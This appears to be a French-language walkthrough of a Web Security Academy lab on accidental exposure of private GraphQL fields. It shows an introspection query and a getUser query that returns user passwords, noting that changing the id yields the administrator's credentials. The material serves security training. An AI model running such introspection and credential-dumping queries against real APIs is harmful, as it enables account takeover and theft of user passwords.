Exposition accidentelle de champs privés

Accidental exposure of private GraphQL fields

Lab: Accidental exposure of private GraphQL fields | Web Security AcademyWebSecAcademy

Contexte du lab

Les fonctionnalités de gestion des utilisateurs reposent sur un endpoint GraphQL. Le lab contient une faiblesse de contrôle d’accès : il est possible de forcer l’API à révéler des champs sensibles (identifiants / mots de passe). Objectif : se connecter en administrateur puis supprimer l’utilisateur carlos.

Requête GraphQL observée

Une requête classique observée côté client :

{
  "query": "\n    query getBlogPost($id: Int!) {\n        getBlogPost(id: $id) {\n            image\n            title\n            author\n            date\n            paragraphs\n        }\n    }",
  "operationName": "getBlogPost",
  "variables": {
    "id": 1
  }
}

Introspection GraphQL

L’introspection est utilisable via une IntrospectionQuery (schéma complet : types, queries, mutations, etc.). Requête envoyée :

query IntrospectionQuery {
    __schema {
        queryType {
            name
        }
        mutationType {
            name
        }
        subscriptionType {
            name
        }
        types {
            ...FullType
        }
        directives {
            name
            description
            locations
            args {
                ...InputValue
            }
        }
    }
}

fragment FullType on __Type {
    kind
    name
    description
    fields(includeDeprecated: true) {
        name
        description
        args {
            ...InputValue
        }
        type {
            ...TypeRef
        }
        isDeprecated
        deprecationReason
    }
    inputFields {
        ...InputValue
    }
    interfaces {
        ...TypeRef
    }
    enumValues(includeDeprecated: true) {
        name
        description
        isDeprecated
        deprecationReason
    }
    possibleTypes {
        ...TypeRef
    }
}

fragment InputValue on __InputValue {
    name
    description
    type {
        ...TypeRef
    }
    defaultValue
}

fragment TypeRef on __Type {
    kind
    name
    ofType {
        kind
        name
        ofType {
            kind
            name
            ofType {
                kind
                name
            }
        }
    }
}

Le serveur répond 200 OK, ce qui confirme que l’introspection est activée.

Analyse des requêtes dans le Site map

En envoyant les requêtes vers Target → Site map, plusieurs queries apparaissent (environ 5).

Une query ressort : getUser.

Exposition des champs privés via `getUser`

Query identifiée :

{
  "query": "query($id: Int!) {\n  getUser(id: $id) {\n    id\n    username\n    password\n  }\n}",
  "variables": {
    "id": 0
  }

Cette query expose le champ password.

Version GraphQL équivalente :

query($id: Int!) {
  getUser(id: $id) {
    id
    username
    password
  }
}

En remplaçant id: 0 par id: 1, l’API retourne le username et le password de administrator :

{
  "id": 1
}

Mis à jour il y a 1 mois

hashtagAccidental exposure of private GraphQL fields

hashtagContexte du lab

hashtagRequête GraphQL observée

hashtagIntrospection GraphQL

hashtagAnalyse des requêtes dans le Site map

hashtagExposition des champs privés via getUser